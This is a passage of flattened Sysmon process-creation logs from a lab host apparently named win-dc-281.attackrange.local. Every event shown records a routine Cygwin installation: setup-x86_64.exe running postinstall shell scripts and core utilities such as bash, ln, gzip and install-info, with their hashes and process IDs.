"/etc/postinstall/bash.sh" 154100x800000000000000054694Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.769{A8622C2F-53FF-6078-430B-00000000AE01}6268C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.761{A8622C2F-53FF-6078-420B-00000000AE01}5996C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-410B-00000000AE01}1844C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054673Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.753{A8622C2F-53FF-6078-410B-00000000AE01}1844C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.745{A8622C2F-53FF-6078-400B-00000000AE01}3788C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-3F0B-00000000AE01}3912C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.738{A8622C2F-53FF-6078-3F0B-00000000AE01}3912C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.729{A8622C2F-53FF-6078-3E0B-00000000AE01}5860C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-3D0B-00000000AE01}6364C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.721{A8622C2F-53FF-6078-3D0B-00000000AE01}6364C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054620Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.711{A8622C2F-53FF-6078-3C0B-00000000AE01}5404C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-3B0B-00000000AE01}1612C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.703{A8622C2F-53FF-6078-3B0B-00000000AE01}1612C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054594Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.665{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.650{A8622C2F-53FF-6078-380B-00000000AE01}5744C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-53FF-6078-370B-00000000AE01}3008C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054573Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.642{A8622C2F-53FF-6078-370B-00000000AE01}3008C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-330B-00000000AE01}6336C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054562Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.632{A8622C2F-53FF-6078-360B-00000000AE01}924C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-53FF-6078-350B-00000000AE01}1496C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.623{A8622C2F-53FF-6078-350B-00000000AE01}1496C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-330B-00000000AE01}6336C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.584{A8622C2F-53FF-6078-330B-00000000AE01}6336C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.564{A8622C2F-53FF-6078-320B-00000000AE01}6196C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-310B-00000000AE01}3176C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.556{A8622C2F-53FF-6078-310B-00000000AE01}3176C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.548{A8622C2F-53FF-6078-300B-00000000AE01}6652C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FF-6078-2F0B-00000000AE01}5800C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.537{A8622C2F-53FF-6078-2F0B-00000000AE01}5800C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054482Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.529{A8622C2F-53FF-6078-2E0B-00000000AE01}1736C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FF-6078-2D0B-00000000AE01}4696C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.517{A8622C2F-53FF-6078-2D0B-00000000AE01}4696C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.470{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.395{A8622C2F-53FF-6078-2A0B-00000000AE01}6364C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FF-6078-290B-00000000AE01}5404C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.388{A8622C2F-53FF-6078-290B-00000000AE01}5404C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054422Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.380{A8622C2F-53FF-6078-280B-00000000AE01}928C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-270B-00000000AE01}5852C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054412Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.364{A8622C2F-53FF-6078-270B-00000000AE01}5852C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-260B-00000000AE01}4344C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054400Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.356{A8622C2F-53FF-6078-260B-00000000AE01}4344C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-250B-00000000AE01}5096C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.349{A8622C2F-53FF-6078-250B-00000000AE01}5096C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054379Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.341{A8622C2F-53FF-6078-240B-00000000AE01}4056C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-230B-00000000AE01}5832C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.326{A8622C2F-53FF-6078-230B-00000000AE01}5832C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-220B-00000000AE01}1628C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.318{A8622C2F-53FF-6078-220B-00000000AE01}1628C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-210B-00000000AE01}5344C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.311{A8622C2F-53FF-6078-210B-00000000AE01}5344C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054336Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.300{A8622C2F-53FF-6078-200B-00000000AE01}1408C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-1F0B-00000000AE01}2508C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054326Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.285{A8622C2F-53FF-6078-1F0B-00000000AE01}2508C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-1E0B-00000000AE01}1028C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054314Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.277{A8622C2F-53FF-6078-1E0B-00000000AE01}1028C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-1D0B-00000000AE01}5620C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054304Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.270{A8622C2F-53FF-6078-1D0B-00000000AE01}5620C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.260{A8622C2F-53FF-6078-1C0B-00000000AE01}4336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-1B0B-00000000AE01}6084C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.245{A8622C2F-53FF-6078-1B0B-00000000AE01}6084C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-1A0B-00000000AE01}5800C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.237{A8622C2F-53FF-6078-1A0B-00000000AE01}5800C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-190B-00000000AE01}4160C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.230{A8622C2F-53FF-6078-190B-00000000AE01}4160C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe 